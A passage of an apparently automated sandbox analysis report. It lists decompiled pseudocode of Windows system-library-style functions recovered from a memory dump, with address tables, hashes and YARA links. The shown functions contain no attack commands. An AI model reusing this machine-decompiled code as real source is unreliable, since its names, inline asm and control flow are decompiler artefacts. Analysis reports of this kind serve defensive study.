				E04D09ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E04D1B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E04DA8A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E04D09702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x4dcb1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}




















                                                                                            0x04cf0055
                                                                                            0x04cf005d
                                                                                            0x04cf0062
                                                                                            0x04cf006c
                                                                                            0x04cf006f
                                                                                            0x04cf0074
                                                                                            0x04cf007a
                                                                                            0x04cf007a
                                                                                            0x04cf0080
                                                                                            0x04cf0080
                                                                                            0x04cf0087
                                                                                            0x04cf008d
                                                                                            0x04cf008f
                                                                                            0x04cf0093
                                                                                            0x04cf0095
                                                                                            0x04cf009b
                                                                                            0x04cf00f8
                                                                                            0x04cf00fb
                                                                                            0x04cf00fc
                                                                                            0x04cf00ff
                                                                                            0x04cf0108
                                                                                            0x04cf0108
                                                                                            0x04cf00a2
                                                                                            0x04cf00a6
                                                                                            0x04cf00b3
                                                                                            0x04cf00bc
                                                                                            0x04cf00c5
                                                                                            0x04cf00ca
                                                                                            0x04d3c01e
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d3c02d
                                                                                            0x04cf00d5
                                                                                            0x04cf00d9
                                                                                            0x04d3c03d
                                                                                            0x04d3c046
                                                                                            0x04d3c046
                                                                                            0x04cf00df
                                                                                            0x04cf00e2
                                                                                            0x04cf00ea
                                                                                            0x04cf00ef
                                                                                            0x04cf00f2
                                                                                            0x04cf00f6
                                                                                            0x04cf0111
                                                                                            0x04cf0117
                                                                                            0x04cf0117
                                                                                            0x00000000
                                                                                            0x04cf00f6
                                                                                            0x04cf00d0
                                                                                            0x04cf00d0
                                                                                            0x00000000

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c300ae06f95f25c931de72065b156264241cee59ecc39191e26164e4407db23e
                                                                                            • Instruction ID: 6a6ccca981100f75bdbf44a8ac637b83667fe2d2ca22af45f0a600ba3342b5c1
                                                                                            • Opcode Fuzzy Hash: c300ae06f95f25c931de72065b156264241cee59ecc39191e26164e4407db23e
                                                                                            • Instruction Fuzzy Hash: 9A319C31701A048FD761CF29C844B56B3E6FF88B18F148569E99687691EA39B801DB90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D56C0A, Relevance: .1, Instructions: 79COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 77%
                                                                                            			E04D56C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E04CF7D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x4dc7b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L04CF4620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E04D1F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E04CF7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E04D19AE0();
						_t23 = L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}












                                                                                            0x04d56c0a
                                                                                            0x04d56c0f
                                                                                            0x04d56c10
                                                                                            0x04d56c13
                                                                                            0x04d56c15
                                                                                            0x04d56c19
                                                                                            0x04d56c1c
                                                                                            0x04d56c21
                                                                                            0x04d56c28
                                                                                            0x04d56c3a
                                                                                            0x04d56c2a
                                                                                            0x04d56c33
                                                                                            0x04d56c33
                                                                                            0x04d56c3f
                                                                                            0x04d56c48
                                                                                            0x04d56c4d
                                                                                            0x04d56c60
                                                                                            0x04d56c65
                                                                                            0x04d56c69
                                                                                            0x04d56c73
                                                                                            0x04d56c79
                                                                                            0x04d56c7f
                                                                                            0x04d56c86
                                                                                            0x04d56c90
                                                                                            0x04d56c94
                                                                                            0x04d56ca6
                                                                                            0x04d56cb2
                                                                                            0x04d56cbd
                                                                                            0x04d56cbd
                                                                                            0x04d56cc3
                                                                                            0x04d56cc7
                                                                                            0x04d56ccb
                                                                                            0x04d56cd0
                                                                                            0x04d56cd1
                                                                                            0x04d56ce2
                                                                                            0x04d56ce2
                                                                                            0x04d56c69
                                                                                            0x04d56ced

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 639773e64b0397b8680d4f584e9c4915324fcaab74869d82ce72672a5e9a3d9c
                                                                                            • Instruction ID: 1054b486b7f767bf0c3a6856690613e73091814fca8be46e70906c47fb285431
                                                                                            • Opcode Fuzzy Hash: 639773e64b0397b8680d4f584e9c4915324fcaab74869d82ce72672a5e9a3d9c
                                                                                            • Instruction Fuzzy Hash: 18219CB1A00644AFDB15DF68D880F6AB7B8FF48744F14006AF908D77A1DA38ED50CBA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D190AF, Relevance: .1, Instructions: 76COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 82%
                                                                                            			E04D190AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E04D2D4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E04D0E5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L04CF4620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E04D1F3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E04D0A2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}


























                                                                                            0x04d190af
                                                                                            0x04d190b8
                                                                                            0x04d190bb
                                                                                            0x04d190bf
                                                                                            0x04d190c2
                                                                                            0x04d190c2
                                                                                            0x04d190c8
                                                                                            0x04d190cb
                                                                                            0x04d190cd
                                                                                            0x04d514d7
                                                                                            0x04d514eb
                                                                                            0x04d514eb
                                                                                            0x00000000
                                                                                            0x04d514eb
                                                                                            0x04d514db
                                                                                            0x04d514e6
                                                                                            0x00000000
                                                                                            0x04d514f2
                                                                                            0x04d514e8
                                                                                            0x00000000
                                                                                            0x04d514e8
                                                                                            0x04d190d8
                                                                                            0x04d190da
                                                                                            0x04d190dd
                                                                                            0x04d190e5
                                                                                            0x00000000
                                                                                            0x04d19139
                                                                                            0x04d190fa
                                                                                            0x04d190fe
                                                                                            0x04d19142
                                                                                            0x00000000
                                                                                            0x04d19142
                                                                                            0x04d19104
                                                                                            0x04d19107
                                                                                            0x04d1910b
                                                                                            0x04d19110
                                                                                            0x04d19118
                                                                                            0x04d19147
                                                                                            0x04d19148
                                                                                            0x04d1914f
                                                                                            0x04d19150
                                                                                            0x04d19151
                                                                                            0x04d19152
                                                                                            0x04d19156
                                                                                            0x04d1915d
                                                                                            0x04d19160
                                                                                            0x04d19168
                                                                                            0x04d1916c
                                                                                            0x04d191bc
                                                                                            0x04d191be
                                                                                            0x00000000
                                                                                            0x04d191be
                                                                                            0x04d1916e
                                                                                            0x04d19173
                                                                                            0x04d19176
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d1917c
                                                                                            0x04d19180
                                                                                            0x04d191b5
                                                                                            0x00000000
                                                                                            0x04d191b5
                                                                                            0x04d19182
                                                                                            0x04d19185
                                                                                            0x04d19189
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d1918e
                                                                                            0x04d19190
                                                                                            0x04d19198
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d191a0
                                                                                            0x00000000
                                                                                            0x04d191ad
                                                                                            0x04d191ad
                                                                                            0x04d191b0
                                                                                            0x04d191b1
                                                                                            0x00000000
                                                                                            0x04d19185
                                                                                            0x04d1911a
                                                                                            0x04d1911c
                                                                                            0x04d1911f
                                                                                            0x04d19125
                                                                                            0x04d19127
                                                                                            0x00000000

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                                            • Instruction ID: f7772c7500c60be56eeddc98de46b9ca5584260d4dbe18e1d8754a876578d97b
                                                                                            • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                                            • Instruction Fuzzy Hash: 572183B1A00604EFDB20DF55D854A5AF7F8EB54314F1488AAED8597260D730FD80CB50
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D03B7A, Relevance: .1, Instructions: 75COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 59%
                                                                                            			E04D03B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x4dc84c4; // 0x0
				_v12 = 1;
				_v8 =  *0x4dc84c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L04CF4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x4dc84c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E04D1AA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E04D1FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x4dc84c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x4dc84c4; // 0x0
					L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}












                                                                                            0x04d03b89
                                                                                            0x04d03b96
                                                                                            0x04d03ba1
                                                                                            0x04d03bab
                                                                                            0x04d03bb5
                                                                                            0x04d03bb9
                                                                                            0x04d46298
                                                                                            0x04d03bbf
                                                                                            0x04d03bc2
                                                                                            0x04d03bc3
                                                                                            0x04d03bc9
                                                                                            0x04d03bca
                                                                                            0x04d03bcc
                                                                                            0x04d03bcd
                                                                                            0x04d03bd4
                                                                                            0x04d03bd6
                                                                                            0x04d03bdb
                                                                                            0x04d03bea
                                                                                            0x04d03bf7
                                                                                            0x04d03bfb
                                                                                            0x04d03bff
                                                                                            0x04d03c09
                                                                                            0x04d03c0a
                                                                                            0x04d03c0b
                                                                                            0x04d03c0f
                                                                                            0x04d03c14
                                                                                            0x04d03c18
                                                                                            0x04d03c18
                                                                                            0x04d03bfb
                                                                                            0x04d03c1b
                                                                                            0x04d03c30
                                                                                            0x04d03c30
                                                                                            0x04d03c3d

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8231517f030583a71c0cea8f1775b8e11ae61e6857def6176a5f058e1c4715b6
                                                                                            • Instruction ID: c7e24c5892576bdacea1158878216ff7974d7fd2c35a7740a3d471b93cfa72d6
                                                                                            • Opcode Fuzzy Hash: 8231517f030583a71c0cea8f1775b8e11ae61e6857def6176a5f058e1c4715b6
                                                                                            • Instruction Fuzzy Hash: 9721BB72A00109AFDB04DF98CD81F6AB7BEFB40308F250069EA08AB251D375FD11DBA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D56CF0, Relevance: .1, Instructions: 74COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 80%
                                                                                            			E04D56CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E04CF7D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E04CF7D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x4cb5c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E04D0F6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E04D0F6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E04D57016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L04CF2400( &_v52);
								}
								_t21 = L04CF2400( &_v28);
							}
						}
					}
				}
				return _t21;
			}



















                                                                                            0x04d56cfb
                                                                                            0x04d56d00
                                                                                            0x04d56d02
                                                                                            0x04d56d06
                                                                                            0x04d56d0a
                                                                                            0x04d56d0e
                                                                                            0x04d56d19
                                                                                            0x04d56d2b
                                                                                            0x04d56d1b
                                                                                            0x04d56d24
                                                                                            0x04d56d24
                                                                                            0x04d56d33
                                                                                            0x04d56d39
                                                                                            0x04d56d46
                                                                                            0x04d56d4f
                                                                                            0x04d56d61
                                                                                            0x04d56d51
                                                                                            0x04d56d5a
                                                                                            0x04d56d5a
                                                                                            0x04d56d69
                                                                                            0x04d56d6b
                                                                                            0x04d56d6d
                                                                                            0x04d56d6f
                                                                                            0x04d56d6f
                                                                                            0x04d56d74
                                                                                            0x04d56d79
                                                                                            0x04d56d7a
                                                                                            0x04d56d7f
                                                                                            0x04d56d82
                                                                                            0x04d56d88
                                                                                            0x04d56d89
                                                                                            0x04d56d90
                                                                                            0x04d56d94
                                                                                            0x04d56da7
                                                                                            0x04d56db1
                                                                                            0x04d56db1
                                                                                            0x04d56dbb
                                                                                            0x04d56dbb
                                                                                            0x04d56d90
                                                                                            0x04d56d69
                                                                                            0x04d56d46
                                                                                            0x04d56dc6

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8ab0f750d6f6039ffdc4a5b9eba40c7dff0fce664162f92cf0416c19b73871bd
                                                                                            • Instruction ID: c8d52b49f77cff77aa246d169a4acce83b5c72853b938126259e200c5c9ccf80
                                                                                            • Opcode Fuzzy Hash: 8ab0f750d6f6039ffdc4a5b9eba40c7dff0fce664162f92cf0416c19b73871bd
                                                                                            • Instruction Fuzzy Hash: 7E21F2726002449BEB21DF28C944BABB7ECFF81744F440957FD84C7260EB34E908C6A2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04DA070D, Relevance: .1, Instructions: 72COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 67%
                                                                                            			E04DA070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E04DA07DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E04D9AFDE( &_v8,  &_v12);
					E04DA1293(_t38, _v28, _t60);
					if(E04CF7D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E04D914FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}













                                                                                            0x04da071b
                                                                                            0x04da0724
                                                                                            0x04da0734
                                                                                            0x04da0738
                                                                                            0x04da074b
                                                                                            0x04da074b
                                                                                            0x04da0753
                                                                                            0x04da0753
                                                                                            0x04da0759
                                                                                            0x04da075d
                                                                                            0x04da0774
                                                                                            0x04da0779
                                                                                            0x04da077d
                                                                                            0x04da0789
                                                                                            0x04da0795
                                                                                            0x04da07a7
                                                                                            0x04da0797
                                                                                            0x04da07a0
                                                                                            0x04da07a0
                                                                                            0x04da07af
                                                                                            0x04da07c4
                                                                                            0x04da07cd
                                                                                            0x04da07cd
                                                                                            0x04da07af
                                                                                            0x04da07dc

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                                                            • Instruction ID: d2539fb049b89051f12d3278aa4cf225e78fb7738e2137bb82a2337adf2f10b0
                                                                                            • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                                                            • Instruction Fuzzy Hash: 8B21F2363042009FD716DF18C880B6ABBA5FBC4354F048669F9958B381D730ED19CB91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04CFAE73, Relevance: .1, Instructions: 70COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 96%
                                                                                            			E04CFAE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E04CF7D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E04CF7D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E04CF7D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E04CF7D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E04D57794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}













                                                                                            0x04cfae78
                                                                                            0x04cfae7c
                                                                                            0x04cfae7e
                                                                                            0x04cfae81
                                                                                            0x04cfae86
                                                                                            0x04cfae8d
                                                                                            0x04d42691
                                                                                            0x04cfae93
                                                                                            0x04cfae93
                                                                                            0x04cfae93
                                                                                            0x04cfae98
                                                                                            0x04cfae9d
                                                                                            0x04d426a2
                                                                                            0x04d426b4
                                                                                            0x04d426a4
                                                                                            0x04d426ad
                                                                                            0x04d426ad
                                                                                            0x04d426b9
                                                                                            0x00000000
                                                                                            0x04d426bb
                                                                                            0x00000000
                                                                                            0x04d426bb
                                                                                            0x04cfaea3
                                                                                            0x04cfaea3
                                                                                            0x04cfaea3
                                                                                            0x04cfaeaa
                                                                                            0x04d426c0
                                                                                            0x04d426c9
                                                                                            0x04d426c9
                                                                                            0x04cfaeb3
                                                                                            0x04d426d4
                                                                                            0x04d426e1
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d426e7
                                                                                            0x04d426ee
                                                                                            0x04d426f0
                                                                                            0x04d426f9
                                                                                            0x04d426f9
                                                                                            0x04d42702
                                                                                            0x04d42708
                                                                                            0x04d42708
                                                                                            0x04d4270b
                                                                                            0x04d4270f
                                                                                            0x04d42711
                                                                                            0x04d42711
                                                                                            0x04d42725
                                                                                            0x04d42725
                                                                                            0x00000000
                                                                                            0x04cfaeb9
                                                                                            0x04cfaeb9
                                                                                            0x04cfaebf
                                                                                            0x04cfaebf
                                                                                            0x04cfaeb3

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                                                            • Instruction ID: a6ea5cbdcd2124821c296bcfb6361ed94aa3a482faae31f7569362f3edf2f424
                                                                                            • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                                                            • Instruction Fuzzy Hash: 2C21F6316016809FEB559F29CD44B2577EAFF84384F1900E1EE088B7A2E739FC50D6A0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D57794, Relevance: .1, Instructions: 70COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 82%
                                                                                            			E04D57794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
